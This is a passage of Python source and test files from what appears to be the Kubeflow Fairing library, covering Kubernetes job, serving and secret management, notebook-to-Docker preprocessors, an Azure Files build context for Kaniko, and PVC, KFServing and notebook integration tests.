raise RuntimeError("Failed to create TFJob. Perhaps the CRD TFJob version "
"{} in not installed(If you use different version you can pass it "
"as ENV variable called "
"`TF_JOB_VERSION`)?".format(constants.TF_JOB_VERSION))
def delete_tf_job(self, name, namespace):
"""Delete the provided TFJob in the specified namespace.
:param name: The name of the TFJob
:param namespace: The namespace of the TFJob
:returns: object: The deleted TFJob.
"""
api_instance = client.CustomObjectsApi()
return api_instance.delete_namespaced_custom_object(
constants.TF_JOB_GROUP,
constants.TF_JOB_VERSION,
namespace,
constants.TF_JOB_PLURAL,
name,
client.V1DeleteOptions())
def create_deployment(self, namespace, deployment):
"""Create an V1Deployment in the specified namespace.
:param namespace: The custom resource
:param deployment: Deployment body to create
:returns: object: Created V1Deployments.
"""
api_instance = client.AppsV1Api()
return api_instance.create_namespaced_deployment(namespace, deployment)
def create_kfserving(self, namespace, kfservice):
"""Create the provided KFServing in the specified namespace.
:param namespace: The namespace in which to create the KFService
:param kfservice: The kfservice body
:returns: object: Created KFService.
"""
api_instance = client.CustomObjectsApi()
try:
return api_instance.create_namespaced_custom_object(
constants.KFSERVING_GROUP,
constants.KFSERVING_VERSION,
namespace,
constants.KFSERVING_PLURAL,
kfservice)
except client.rest.ApiException:
raise RuntimeError("Failed to create KFService. Perhaps the CRD KFServing version "
"{} is not installed?".format(constants.KFSERVING_VERSION))
def delete_kfserving(self, name, namespace):
"""Delete the provided KFServing in the specified namespace.
:param name: The name of the KFService
:param namespace: The namespace of the KFService
:returns: object: The deleted kfservice.
"""
api_instance = client.CustomObjectsApi()
return api_instance.delete_namespaced_custom_object(
constants.KFSERVING_GROUP,
constants.KFSERVING_VERSION,
namespace,
constants.KFSERVING_PLURAL,
name,
client.V1DeleteOptions())
def delete_job(self, name, namespace):
"""Delete the specified job and related pods.
:param name: The job name
:param namespace: The namespace of the job
:returns: object: the deleted job.
"""
api_instance = client.BatchV1Api()
api_instance.delete_namespaced_job(
name,
namespace,
client.V1DeleteOptions())
def delete_deployment(self, name, namespace):
"""Delete an existing model deployment and relinquish all resources associated.
:param name: The deployment name
:param namespace: The namespace of the deployment
:returns: object: The deleted deployment.
"""
api_instance = client.ExtensionsV1beta1Api()
api_instance.delete_namespaced_deployment(
name,
namespace,
client.V1DeleteOptions())
def secret_exists(self, name, namespace):
"""Check if the secret exists in the specified namespace.
:param name: The secret name
:param namespace: The namespace to look for the secret in.
:returns: bool: True if the secret exists, otherwise return False.
"""
secrets = client.CoreV1Api().list_namespaced_secret(namespace)
secret_names = [secret.metadata.name for secret in secrets.items]
return name in secret_names
def create_secret(self, namespace, secret):
"""Create secret in the specified namespace.
:param namespace: The namespace in which to create the secret
:param secret: The secret body
:returns: object: Created secret.
"""
api_instance = client.CoreV1Api()
return api_instance.create_namespaced_secret(namespace, secret)
def get_service_external_endpoint(self, name, namespace, selectors=None): #pylint:disable=inconsistent-return-statements
"""Get the service external endpoint as http://ip_or_hostname:5000/predict.
:param name: The service name
:param namespace: The namespace of the service
:param selectors: A selector to restrict the list of returned objects by their labels.
Defaults to everything.
:returns: str: the service external endpoint.
"""
label_selector_str = ', '.join("{}={}".format(k, v) for (k, v) in selectors.items())
v1 = client.CoreV1Api()
w = watch.Watch()
print("Waiting for prediction endpoint to come up...")
try:
for event in w.stream(v1.list_namespaced_service,
namespace=namespace,
label_selector=label_selector_str):
svc = event['object']
logger.debug("Event: %s %s",
event['type'],
event['object'])
ing = svc.status.load_balancer.ingress
if ing is not None and len(ing) > 0: #pylint:disable=len-as-condition
url = "http://{}:5000/predict".format(ing[0].ip or ing[0].hostname)
return url
except ValueError as v:
logger.error("error getting status for {} {}".format(name, str(v)))
except client.rest.ApiException as e:
logger.error("error getting status for {} {}".format(name, str(e)))
def log(self, name, namespace, selectors=None, container='', follow=True):
"""Get log of the specified pod.
:param name: The pod name
:param namespace: The namespace of the pod
:param selectors: A selector to restrict the list of returned objects by their labels.
Defaults to everything.
:param container: The container for which to stream logs; defaults to the only
container if the pod has a single container.
:param follow: True or False (Default value = True)
:returns: str: logs of the specified pod.
"""
tail = ''
label_selector_str = ', '.join("{}={}".format(k, v) for (k, v) in selectors.items())
v1 = client.CoreV1Api()
# Retry to allow starting of pod
w = watch.Watch()
try:
for event in w.stream(v1.list_namespaced_pod,
namespace=namespace,
label_selector=label_selector_str):
pod = event['object']
logger.debug("Event: %s %s %s",
event['type'],
pod.metadata.name,
pod.status.phase)
if pod.status.phase == 'Pending':
logger.warning('Waiting for {} to start...'.format(pod.metadata.name))
continue
elif ((pod.status.phase == 'Running'
and pod.status.container_statuses[0].ready)
or pod.status.phase == 'Succeeded'):
logger.info("Pod started running %s",
pod.status.container_statuses[0].ready)
tail = v1.read_namespaced_pod_log(pod.metadata.name,
namespace,
follow=follow,
_preload_content=False,
pretty='pretty',
container=container)
break
elif (event['type'] == 'DELETED'
or pod.status.phase == 'Failed'
or pod.status.container_statuses[0].state.waiting):
logger.error("Failed to launch %s, reason: %s, message: %s",
pod.metadata.name,
pod.status.container_statuses[0].state.terminated.reason,
pod.status.container_statuses[0].state.terminated.message)
tail = v1.read_namespaced_pod_log(pod.metadata.name,
namespace,
follow=follow,
_preload_content=False,
pretty='pretty',
container=container)
break
except ValueError as v:
logger.error("error getting status for {} {}".format(name, str(v)))
except client.rest.ApiException as e:
logger.error("error getting status for {} {}".format(name, str(e)))
if tail:
try:
for chunk in tail.stream(MAX_STREAM_BYTES):
print(chunk.rstrip().decode('utf8'))
finally:
tail.release_conn()
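# Example usage (a minimal sketch; assumes a reachable cluster and a V1Job
# body named `job_body` built elsewhere -- both hypothetical):
#
#   manager = KubeManager()
#   created = manager.create_job("default", job_body)
#   manager.log(created.metadata.name, "default",
#               selectors={"job-name": created.metadata.name})
#   manager.delete_job(created.metadata.name, "default")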
<file_sep>/tests/integration/onprem/test_pvc_mounting.py
import sys
import time
import uuid
import joblib
from kubernetes import client
from kubeflow import fairing
from kubeflow.fairing.constants import constants
from kubeflow.fairing.kubernetes.utils import mounting_pvc
GCS_PROJECT_ID = fairing.cloud.gcp.guess_project_name()
DOCKER_REGISTRY = 'gcr.io/{}'.format(GCS_PROJECT_ID)
# Dummy training function to be submitted
def train_fn(msg):
for _ in range(30):
time.sleep(0.1)
print(msg)
# Update module to work with function preprocessor
# TODO: Remove when the function preprocessor works with functions from
# other modules.
train_fn.__module__ = '__main__'
def get_job_with_labels(namespace, labels):
api_instance = client.BatchV1Api()
return api_instance.list_namespaced_job(
namespace,
label_selector=labels)
def get_deployment_with_labels(namespace, labels):
api_instance = client.AppsV1Api()
return api_instance.list_namespaced_deployment(
namespace,
label_selector=labels)
def submit_jobs_with_pvc(capsys, cleanup=False, namespace="default", # pylint:disable=unused-argument
pvc_name=None, pvc_mount_path=None):
py_version = ".".join([str(x) for x in sys.version_info[0:3]])
base_image = 'registry.hub.docker.com/library/python:{}'.format(py_version)
fairing.config.set_builder(
'append', base_image=base_image, registry=DOCKER_REGISTRY)
if pvc_mount_path:
pod_spec_mutators = [mounting_pvc(
pvc_name=pvc_name, pvc_mount_path=pvc_mount_path)]
else:
pod_spec_mutators = [mounting_pvc(pvc_name=pvc_name)]
expected_result = str(uuid.uuid4())
fairing.config.set_deployer('job', namespace=namespace, cleanup=cleanup,
labels={'pytest-id': expected_result}, stream_log=False,
pod_spec_mutators=pod_spec_mutators)
remote_train = fairing.config.fn(lambda: train_fn(expected_result))
remote_train()
created_job = get_job_with_labels(
namespace, 'pytest-id=' + expected_result)
assert pvc_name == created_job.items[0].spec.template.spec.volumes[0]\
.persistent_volume_claim.claim_name
if pvc_mount_path:
assert pvc_mount_path == created_job.items[0].spec.template.spec.containers[0]\
.volume_mounts[0].mount_path
else:
assert constants.PVC_DEFAULT_MOUNT_PATH == created_job.items[
0].spec.template.spec.containers[0].volume_mounts[0].mount_path
class TestServe(object):
def __init__(self, model_file='test_model.dat'):
self.model = joblib.load(model_file)
def predict(self, X, feature_names): # pylint:disable=unused-argument
prediction = self.model.predict(data=X)
return [[prediction.item(0), prediction.item(0)]]
def submit_serving_with_pvc(capsys, namespace='default', pvc_name=None, pvc_mount_path=None): # pylint:disable=unused-argument
fairing.config.set_builder('docker',
registry=DOCKER_REGISTRY,
base_image="seldonio/seldon-core-s2i-python3:0.4")
if pvc_mount_path:
pod_spec_mutators = [mounting_pvc(
pvc_name=pvc_name, pvc_mount_path=pvc_mount_path)]
else:
pod_spec_mutators = [mounting_pvc(pvc_name=pvc_name)]
expected_result = str(uuid.uuid4())
fairing.config.set_deployer('serving', serving_class="TestServe",
labels={'pytest-id': expected_result},
service_type='ClusterIP',
pod_spec_mutators=pod_spec_mutators)
fairing.config.run()
created_deployment = get_deployment_with_labels(
namespace, 'pytest-id=' + expected_result)
assert pvc_name == created_deployment.items[0].spec.template.spec.volumes[0]\
.persistent_volume_claim.claim_name
if pvc_mount_path:
assert pvc_mount_path == created_deployment.items[
0].spec.template.spec.containers[0].volume_mounts[0].mount_path
else:
assert constants.PVC_DEFAULT_MOUNT_PATH == created_deployment.items[
0].spec.template.spec.containers[0].volume_mounts[0].mount_path
def test_job_pvc_mounting(capsys):
'''Test pvc mounting for Job'''
submit_jobs_with_pvc(capsys, pvc_name='testpvc', pvc_mount_path='/pvcpath')
def test_job_pvc_mounting_without_path(capsys):
'''Test default mount path'''
submit_jobs_with_pvc(capsys, pvc_name='testpvc')
def pass_test_serving_pvc_mounting(capsys):
'''Test pvc mount for serving'''
submit_serving_with_pvc(capsys, pvc_name='testpvc', pvc_mount_path='/pvcpath')
def pass_test_serving_pvc_mounting_without_path(capsys):
'''Test default mount path for serving'''
submit_serving_with_pvc(capsys, pvc_name='testpvc')
<file_sep>/tests/unit/deployers/kfserving.py
from unittest.mock import patch
from kubeflow.fairing.deployers.kfserving.kfserving import KFServing
from kubeflow.fairing.constants import constants
DEFAULT_URI = 'gs://kfserving-samples/models/tensorflow/flowers'
CANARY_URI = 'gs://kfserving-samples/models/tensorflow/flowers'
def run_unit_test_kfserving(framework, default_model_uri, **kwargs):
kfsvc_name = 'test_kfservice'
with patch('kubeflow.fairing.deployers.kfserving.kfserving.KFServing.deploy',
return_value=kfsvc_name):
kfsvc = KFServing(framework=framework,
default_model_uri=default_model_uri, **kwargs)
generated_kfsvc = str(kfsvc.generate_kfservice())
assert constants.KFSERVING_KIND in generated_kfsvc
assert constants.KFSERVING_GROUP + '/' + \
constants.KFSERVING_VERSION in generated_kfsvc
for key in kwargs:
if key != "labels":
assert str(kwargs[key]) in generated_kfsvc
else:
assert "test_labels" in generated_kfsvc
assert kfsvc_name == kfsvc.deploy("test")
# Test kfserving function with default_model_uri.
def test_kfserving_default_model_spec():
run_unit_test_kfserving('tensorflow', DEFAULT_URI)
# Test kfserving function with namespace, default_model_uri and canary_model_uri.
def test_kfserving_default_canary_model_spec():
run_unit_test_kfserving('tensorflow', DEFAULT_URI,
namespace='kubeflow',
canary_model_uri=CANARY_URI)
# Test kfserving function with namespace, default_model_uri, canary_model_uri,
# and canary_traffic_percent
def test_kfserving_canary_traffic_percent():
run_unit_test_kfserving('tensorflow', DEFAULT_URI,
namespace='kubeflow',
canary_model_uri=CANARY_URI,
canary_traffic_percent=10)
# Test kfserving function with some labels and annotations
def test_kfserving_labels_annotations():
run_unit_test_kfserving('tensorflow', DEFAULT_URI,
namespace='kubeflow',
labels={'test-id': 'test_labels'},
annotations="test=test123")
<file_sep>/kubeflow/fairing/preprocessors/full_notebook.py
import os
from kubeflow.fairing.preprocessors.base import BasePreProcessor
from kubeflow.fairing.constants import constants
from kubeflow.fairing.notebook import notebook_util
class FullNotebookPreProcessor(BasePreProcessor):
""" The Full notebook preprocess for the context which comes from BasePreProcessor.
:param BasePreProcessor: a context that gets sent to the builder for the docker build and
sets the entrypoint
"""
# TODO: Allow configuration of errors / timeout options
def __init__(self,
notebook_file=None,
output_file="fairing_output_notebook.ipynb",
input_files=None,
command=None,
path_prefix=constants.DEFAULT_DEST_PREFIX,
output_map=None):
""" Init the full notebook preprocess.
:param notebook_file: the jupyter notebook file.
:param output_file: the output file, the defaut name is 'fairing_output_notebook.ipynb'.
:param input_files: the source files to be processed.
:param command: the command to pass to the builder.
:param path_prefix: the defaut destion path prefix '/app/'.
:param output_map: a dict of files to be added without preprocessing.
"""
if notebook_file is None and notebook_util.is_in_notebook():
notebook_file = notebook_util.get_notebook_name()
if notebook_file is None:
raise ValueError('A notebook_file must be provided.')
relative_notebook_file = notebook_file
# Convert absolute notebook path to relative path
if os.path.isabs(notebook_file):
relative_notebook_file = os.path.relpath(notebook_file)
if command is None:
command = ["papermill", relative_notebook_file, output_file, "--log-output"]
input_files = input_files or []
if relative_notebook_file not in input_files:
input_files.append(relative_notebook_file)
super().__init__(
executable=None,
input_files=input_files,
command=command,
output_map=output_map,
path_prefix=path_prefix)
def set_default_executable(self):
""" Ingore the default executable setting for the full_notebook preprocessor.
"""
pass
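# Example usage (a minimal sketch; the notebook path is hypothetical):
#
#   preprocessor = FullNotebookPreProcessor(notebook_file="train.ipynb")
#   context_file, checksum = preprocessor.context_tar_gz()
#   print(preprocessor.get_command())
#   # -> ['papermill', 'train.ipynb', 'fairing_output_notebook.ipynb', '--log-output']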
<file_sep>/kubeflow/fairing/preprocessors/base.py
import os
import tarfile
import logging
import posixpath
import tempfile
from kubeflow import fairing
from kubeflow.fairing.constants import constants
from kubeflow.fairing import utils
class BasePreProcessor(object):
"""Prepares a context that gets sent to the builder for the docker build and sets the entrypoint
:param input_files: the source files to be processed
:param executable: the file to execute using command (e.g. main.py)
:param output_map: a dict of files to be added without preprocessing
:param path_prefix: the prefix of the path where the files will be added in the container
:param command: the command to pass to the builder
"""
def __init__(self,
input_files=None,
command=None,
executable=None,
path_prefix=constants.DEFAULT_DEST_PREFIX,
output_map=None):
self.executable = executable
input_files = input_files or []
command = command or ["python"]
self.input_files = set([os.path.normpath(f) for f in input_files])
output_map = output_map if output_map else {}
normalized_map = {}
for src, dst in output_map.items():
normalized_map[os.path.normpath(src)] = os.path.normpath(dst)
self.output_map = normalized_map
self.path_prefix = path_prefix
self.command = command
self.set_default_executable()
# TODO: Add workaround for users who do not want to set an executable for
# their command.
def set_default_executable(self): #pylint:disable=inconsistent-return-statements
""" Set the default executable file.
:returns: executable: the default executable file if one can be inferred, or None
"""
if self.executable is not None:
return self.executable
if len(self.input_files) == 1:
self.executable = list(self.input_files)[0]
return
python_files = [item for item in self.input_files if item.endswith(".py")
and item != '__init__.py']
if len(python_files) == 1:
self.executable = python_files[0]
return
def preprocess(self):
""" Preprocess the 'input_files'.
:returns: input_files: the input files
"""
return self.input_files
def context_map(self):
""" Create context mapping from destination to source to avoid duplicates in context archive
:returns: c_map: a context map
"""
c_map = {}
for src, dst in self.fairing_runtime_files().items():
if dst not in c_map:
c_map[dst] = src
else:
logging.warning('{} already exists in Fairing context, skipping...'.format(src))
for f in self.input_files:
dst = os.path.join(self.path_prefix, f)
if dst not in c_map:
c_map[dst] = f
else:
logging.warning('{} already exists in Fairing context, skipping...'.format(f))
for src, dst in self.output_map.items():
if dst not in c_map:
c_map[dst] = src
else:
logging.warning('{} already exists in Fairing context, skipping...'.format(src))
return c_map
def context_tar_gz(self, output_file=None):
"""Creating docker context file and compute a running cyclic redundancy check checksum.
:param output_file: output file (Default value = None)
:returns: output_file,checksum: docker context file and checksum
"""
if not output_file:
_, output_file = tempfile.mkstemp(prefix="/tmp/fairing_context_")
logging.info("Creating docker context: %s", output_file)
self.input_files = self.preprocess()
with tarfile.open(output_file, "w:gz", dereference=True) as tar:
for dst, src in self.context_map().items():
logging.debug("Context: %s, Adding %s at %s", output_file,
src, dst)
tar.add(src, filter=reset_tar_mtime, arcname=dst, recursive=False)
self._context_tar_path = output_file
return output_file, utils.crc(self._context_tar_path)
def get_command(self):
""" Get the execute with absolute path
:returns: cmd: the execute with absolute path
"""
if self.command is None:
return []
cmd = self.command.copy()
if self.executable is not None:
cmd.append(os.path.join(self.path_prefix, self.executable))
return cmd
def fairing_runtime_files(self):
"""Search the fairing runtime files 'runtime_config.py'
:returns: cmd: the execute with absolute path
"""
fairing_dir = os.path.dirname(fairing.__file__)
ret = {}
for f in ["__init__.py", "runtime_config.py"]:
src = os.path.normpath(os.path.join(fairing_dir, f))
dst = os.path.normpath(os.path.join(self.path_prefix, "fairing", f))
ret[src] = dst
return ret
def is_requirements_txt_file_present(self):
""" Verfiy the requirements txt file if it is present.
:returns: res: get the present required files
"""
dst_files = self.context_map().keys()
reqs_file = posixpath.join(self.path_prefix, "requirements.txt")
res = reqs_file in dst_files
return res
def reset_tar_mtime(tarinfo):
"""Reset the mtime on the the tarball for reproducibility.
:param tarinfo: the tarball var
:returns: tarinfo: the modified tar ball
"""
tarinfo.mtime = 0
return tarinfo
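# Example usage (a minimal sketch; the file names are hypothetical):
#
#   preprocessor = BasePreProcessor(input_files=["train.py", "utils.py"],
#                                   executable="train.py")
#   context_file, checksum = preprocessor.context_tar_gz()
#   print(preprocessor.get_command())  # -> ['python', '/app/train.py']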
<file_sep>/kubeflow/fairing/builders/cluster/azurestorage_context.py
import uuid
from kubernetes import client
from kubeflow.fairing import utils
from kubeflow.fairing.builders.cluster.context_source import ContextSourceInterface
from kubeflow.fairing.cloud import azure
from kubeflow.fairing.constants import constants
class StorageContextSource(ContextSourceInterface):
def __init__(self, namespace=None, region=None,
resource_group_name=None, storage_account_name=None):
self.namespace = namespace or utils.get_default_target_namespace()
self.region = region or "NorthEurope"
self.resource_group_name = resource_group_name or "fairing"
self.storage_account_name = storage_account_name or "fairing{}".format(
uuid.uuid4().hex[:17]
)
self.share_name = constants.AZURE_FILES_SHARED_FOLDER
self.context_hash = None
self.context_path = None
def prepare(self, context_filename): # pylint:disable=arguments-differ
self.context_hash = utils.crc(context_filename)
self.context_path = self.upload_context(context_filename)
def upload_context(self, context_filename):
# Kaniko doesn't support Azure Storage yet.
# So instead of uploading the context tar.gz file to Azure Storage
# we are uploading the files in the context to a shared folder in Azure Files,
# mounting the shared folder into the Kaniko pod,
# and providing Kaniko with a local path to the files.
azure_uploader = azure.AzureFileUploader(self.namespace)
dir_name = "build_{}".format(self.context_hash)
storage_account_name, storage_key = azure_uploader.upload_to_share(
self.region,
self.resource_group_name,
self.storage_account_name,
self.share_name,
dir_name=dir_name,
tar_gz_file_to_upload=context_filename)
# This is the secret that we need to mount the shared folder into the Kaniko pod
azure.create_storage_creds_secret(
self.namespace, self.context_hash, storage_account_name, storage_key
)
# Local path to the files
return "/mnt/azure/{}/".format(dir_name)
def cleanup(self):
azure.delete_storage_creds_secret(self.namespace, self.context_hash)
def generate_pod_spec(self, image_name, push): # pylint:disable=arguments-differ
args = ["--dockerfile=Dockerfile",
"--destination={}".format(image_name),
"--context={}".format(self.context_path)]
if not push:
args.append("--no-push")
return client.V1PodSpec(
containers=[client.V1Container(
name='kaniko',
image=constants.KANIKO_IMAGE,
args=args,
)],
restart_policy='Never'
)
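# Example usage (a minimal sketch; the namespace, image name and context
# tarball path are hypothetical):
#
#   context_source = StorageContextSource(namespace="kubeflow")
#   context_source.prepare("/tmp/fairing_context.tar.gz")
#   pod_spec = context_source.generate_pod_spec(
#       "myregistry.azurecr.io/app:latest", push=True)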
<file_sep>/kubeflow/fairing/preprocessors/converted_notebook.py
import logging
import nbconvert
import re
from nbconvert.preprocessors import Preprocessor as NbPreProcessor
from pathlib import Path
from kubeflow.fairing.preprocessors.base import BasePreProcessor
from kubeflow.fairing.notebook import notebook_util
from kubeflow.fairing.constants import constants
class FilterMagicCommands(NbPreProcessor):
"""Notebook preprocessor that have a comment which started with '!' or '%'.
:param NbPreProcessor: the notebook preprocessor.
"""
_magic_pattern = re.compile('^!|^%')
def filter_magic_commands(self, src):
"""Filter out the source commands with magic pattern.
:param src: the source commands.
:returns: filtered: the filtered commands list.
"""
filtered = []
for line in src.splitlines():
match = self._magic_pattern.match(line)
if match is None:
filtered.append(line)
return '\n'.join(filtered)
def preprocess_cell(self, cell, resources, index): #pylint:disable=unused-argument
"""preprocessor that includes cells
:param: cell: the notebook cell.
:param: resources: the code source of the notebook cell.
:param: index: unused argumnet.
:return: cell,resources: the notebook cell and its filtered with magic pattern commands.
"""
if cell['cell_type'] == 'code':
cell['source'] = self.filter_magic_commands(cell['source'])
return cell, resources
class FilterIncludeCell(NbPreProcessor):
"""Notebook preprocessor that only includes cells that have a comment 'fairing:include-cell'.
:param NbPreProcessor: the notebook preprocessor.
"""
_pattern = re.compile('.*fairing:include-cell.*')
def filter_include_cell(self, src):
"""Filter the cell that have a comment 'fairing:include-cell'.
:param: src: the source cell.
:returns: src: if the source cell matched the filter pattern, or Null.
"""
for line in src.splitlines():
match = self._pattern.match(line)
if match:
return src
return ''
def preprocess_cell(self, cell, resources, index): #pylint:disable=unused-argument
""" Preprocess the notebook cell.
:param cell: the notebook cell
:param resources: the code source of the notebook cell.
:param index: unused argument.
:return: cell,resources: the notebook cell filtered by the include pattern, and the resources.
"""
if cell['cell_type'] == 'code':
cell['source'] = self.filter_include_cell(cell['source'])
return cell, resources
class ConvertNotebookPreprocessor(BasePreProcessor):
"""Convert the notebook preprocessor.
:param BasePreProcessor: a context that gets sent to the builder for the docker build
and sets the entrypoint.
"""
def __init__(self, #pylint:disable=dangerous-default-value
notebook_file=None,
notebook_preprocessor=FilterMagicCommands,
executable=None,
command=["python"],
path_prefix=constants.DEFAULT_DEST_PREFIX,
output_map=None,
overwrite=True):
"""The init function ConvertNotebookPreprocessor class.
:param notebook_file: the notebook file.
:param notebook_preprocessor: the class FilterMagicCommands.
:param executable: the file to execute using command (e.g. main.py)
:param command: the python command.
:param path_prefix: the defaut destion path prefix '/app/'.
:param output_map: a dict of files to be added without preprocessing.
"""
super().__init__(
executable=executable,
input_files=[],
output_map=output_map,
path_prefix=path_prefix)
if notebook_file is None and notebook_util.is_in_notebook():
notebook_file = notebook_util.get_notebook_name()
self.notebook_file = notebook_file
self.notebook_preprocessor = notebook_preprocessor
self.overwrite = overwrite
def preprocess(self):
"""Preprocessor the Notebook
:return:[]: the converted notebook list.
"""
exporter = nbconvert.PythonExporter()
exporter.register_preprocessor(self.notebook_preprocessor, enabled=True)
contents, _ = exporter.from_filename(self.notebook_file)
converted_notebook = Path(self.notebook_file).with_suffix('.py')
if converted_notebook.exists() and not self.overwrite:
raise Exception('Default path {} exists but overwrite flag\
is False'.format(converted_notebook))
with open(converted_notebook, 'w') as f:
logging.info('Converting {} to {}'.format(self.notebook_file, converted_notebook))
f.write(contents)
self.executable = converted_notebook
return [converted_notebook]
class ConvertNotebookPreprocessorWithFire(ConvertNotebookPreprocessor):
"""Create an entrpoint using pyfire."""
def __init__(self, #pylint:disable=dangerous-default-value
class_name=None,
notebook_file=None,
notebook_preprocessor=FilterIncludeCell,
executable=None,
command=["python"],
path_prefix=constants.DEFAULT_DEST_PREFIX,
output_map=None,
overwrite=True):
"""The init function ConvertNotebookPreprocessorWithFire class
:param class_name: the name of the notebook preprocessor.
:param notebook_file: the notebook file.
:param notebook_preprocessor: the class FilterIncludeCell.
:param command: the python command.
:param path_prefix: the defaut destion path prefix '/app/'.
:param output_map: a dict of files to be added without preprocessing.
"""
super().__init__(
notebook_file=notebook_file,
notebook_preprocessor=notebook_preprocessor,
executable=executable,
command=command,
path_prefix=path_prefix,
output_map=output_map)
self.class_name = class_name
self.overwrite = overwrite
def preprocess(self):
"""Preprocessor the Notebook.
:return: results: the preprocessed notebook list.
"""
exporter = nbconvert.PythonExporter()
exporter.register_preprocessor(self.notebook_preprocessor, enabled=True)
processed, _ = exporter.from_filename(self.notebook_file)
lines = []
for l in processed.splitlines():
# Get rid of multiple blank lines
if not l.strip():
if lines:
if not lines[-1]:
# last line is already blank don't add another one
continue
# strip "# In[...]" cell markers
if l.startswith("# In["):
continue
lines.append(l)
contents = "\n".join(lines)
converted_notebook = Path(self.notebook_file).with_suffix('.py')
if converted_notebook.exists() and not self.overwrite:
raise Exception('Default path {} exists but overwrite flag\
is False'.format(converted_notebook))
with open(converted_notebook, 'w') as f:
logging.info('Converting {} to {}'.format(self.notebook_file, converted_notebook))
f.write(contents)
f.write("\n")
logging.info('Creating entry point for the class name {}'.format(self.class_name))
f.write("""
if __name__ == "__main__":
import fire
import logging
logging.basicConfig(format='%(message)s')
logging.getLogger().setLevel(logging.INFO)
fire.Fire({0})
""".format(self.class_name))
self.executable = converted_notebook
results = [converted_notebook]
results.extend(self.input_files)
return results
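# Example usage (a minimal sketch; the notebook and class name are hypothetical):
#
#   preprocessor = ConvertNotebookPreprocessorWithFire(
#       class_name="ModelServe", notebook_file="train.ipynb")
#   files = preprocessor.preprocess()  # writes train.py with a fire entry point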
<file_sep>/tests/integration/azure/test_running_in_notebooks.py
import os
import logging
from ..helpers import run_notebook_test
logger = logging.getLogger(__name__)
def update_parameters(parameters, parameter_name):
if parameter_name in os.environ:
parameters[parameter_name] = os.environ[parameter_name]
def test_xgboost_highlevel_apis():
file_dir = os.path.dirname(__file__)
notebook_rel_path = "../../../examples/prediction/xgboost-high-level-apis.ipynb"
notebook_abs_path = os.path.normpath(os.path.join(file_dir, notebook_rel_path))
expected_messages = [
"Model export success: trained_ames_model.dat",
"Deploying the endpoint.",
"Prediction endpoint: http",
"Deleting the endpoint."
]
parameters = {
"FAIRING_BACKEND": "KubeflowAzureBackend"
}
update_parameters(parameters, "DOCKER_REGISTRY")
update_parameters(parameters, "AZURE_RESOURCE_GROUP")
update_parameters(parameters, "AZURE_STORAGE_ACCOUNT")
update_parameters(parameters, "AZURE_REGION")
run_notebook_test(notebook_abs_path, expected_messages, parameters=parameters)
<file_sep>/tests/integration/helpers.py
import tempfile
import logging
import os
import papermill
logger = logging.getLogger(__name__)
def execute_notebook(notebook_path, parameters=None):
temp_dir = tempfile.mkdtemp()
notebook_output_path = os.path.join(temp_dir, "out.ipynb")
papermill.execute_notebook(notebook_path, notebook_output_path,
cwd=os.path.dirname(notebook_path),
parameters=parameters)
return notebook_output_path
def run_notebook_test(notebook_path, expected_messages, parameters=None):
output_path = execute_notebook(notebook_path, parameters=parameters)
actual_output = open(output_path, 'r').read()
# TODO (karthikv2k): use something like https://github.com/nteract/scrapbook
# for reading notebooks
for expected_message in expected_messages:
# TODO (karthikv2k): find a better way to test notebook execution success
if expected_message not in actual_output:
logger.error(actual_output)
assert False, "Unable to find from output: " + expected_message
<file_sep>/kubeflow/fairing/backends/__init__.py
from kubeflow.fairing.backends.backends import *
<file_sep>/tests/integration/azure/test_azure_file_uploader.py
import os
from azure.common.credentials import ServicePrincipalCredentials
from azure.mgmt.storage.models import StorageAccount
from kubeflow.fairing.cloud.azure import AzureFileUploader
STORAGE_ACCOUNT_NAME = os.environ.get('AZURE_STORAGE_ACCOUNT')
RESOURCE_GROUP = os.environ.get('AZURE_RESOURCE_GROUP')
REGION = os.environ.get('AZURE_REGION')
def test_storage_account_creation():
credentials = ServicePrincipalCredentials(
client_id=os.environ.get('AZ_CLIENT_ID'),
secret=os.environ.get('AZ_CLIENT_SECRET'),
tenant=os.environ.get('AZ_TENANT_ID')
)
subscription_id = os.environ.get('AZ_SUBSCRIPTION_ID')
file_uploader = AzureFileUploader(
RESOURCE_GROUP, credentials=credentials, subscription_id=subscription_id
)
storage_account = file_uploader.create_storage_account_if_not_exists(
REGION, RESOURCE_GROUP, STORAGE_ACCOUNT_NAME
)
assert isinstance(storage_account, StorageAccount)
assert storage_account.name == STORAGE_ACCOUNT_NAME
<file_sep>/tests/integration/gcp/test_running_in_notebooks.py
import os
import pytest
from ..helpers import run_notebook_test
@pytest.mark.skip(reason="GCPManaged backend needs to take build context as input")
def test_xgboost_highlevel_apis_gcp_managed():
file_dir = os.path.dirname(__file__)
notebook_rel_path = "../../../examples/prediction/xgboost-high-level-apis.ipynb"
notebook_abs_path = os.path.normpath(
os.path.join(file_dir, notebook_rel_path))
expected_messages = [
"Model export success: trained_ames_model.dat", # KF training
"Access job logs at the following URL:", # GCP managed submission success
"Prediction endpoint: http", # create endpoint success
]
parameters = {
"FAIRING_BACKEND": "GCPManagedBackend"
}
run_notebook_test(notebook_abs_path, expected_messages, parameters=parameters)
def test_xgboost_highlevel_apis_gke():
file_dir = os.path.dirname(__file__)
notebook_rel_path = "../../../examples/prediction/xgboost-high-level-apis.ipynb"
notebook_abs_path = os.path.normpath(
os.path.join(file_dir, notebook_rel_path))
expected_messages = [
"Model export success: trained_ames_model.dat", #KF training
"Prediction endpoint: http", #create endpoint success
]
parameters = {
"FAIRING_BACKEND": "KubeflowGKEBackend"
}
run_notebook_test(notebook_abs_path, expected_messages, parameters=parameters)
def test_lightgbm():
file_dir = os.path.dirname(__file__)
notebook_rel_path = "../../../examples/lightgbm/distributed-training.ipynb"
notebook_abs_path = os.path.normpath(
os.path.join(file_dir, notebook_rel_path))
expected_messages = [
"Copying gs://fairing-lightgbm/regression-example/regression.train.weight",
"[LightGBM] [Info] Finished initializing network", # dist training setup
"[LightGBM] [Info] Iteration:10, valid_1 l2 : 0.2",
"[LightGBM] [Info] Finished training",
"Prediction mean: 0.5",
", count: 500"
]
run_notebook_test(notebook_abs_path, expected_messages)
<file_sep>/kubeflow/fairing/deployers/kfserving/kfserving.py
import uuid
import logging
from kubernetes import client as k8s_client
from kubeflow.fairing.constants import constants
from kubeflow.fairing.deployers.deployer import DeployerInterface
from kubeflow.fairing.kubernetes.manager import KubeManager
from kubeflow.fairing import utils
logger = logging.getLogger(__name__)
class KFServing(DeployerInterface):
"""Serves a prediction endpoint using Kubeflow KFServing."""
def __init__(self, framework, default_model_uri=None, canary_model_uri=None,
canary_traffic_percent=0, namespace=None, labels=None, annotations=None,
custom_default_spec=None, custom_canary_spec=None, stream_log=True,
cleanup=False):
"""
:param framework: The framework for the kfservice, such as TensorFlow,
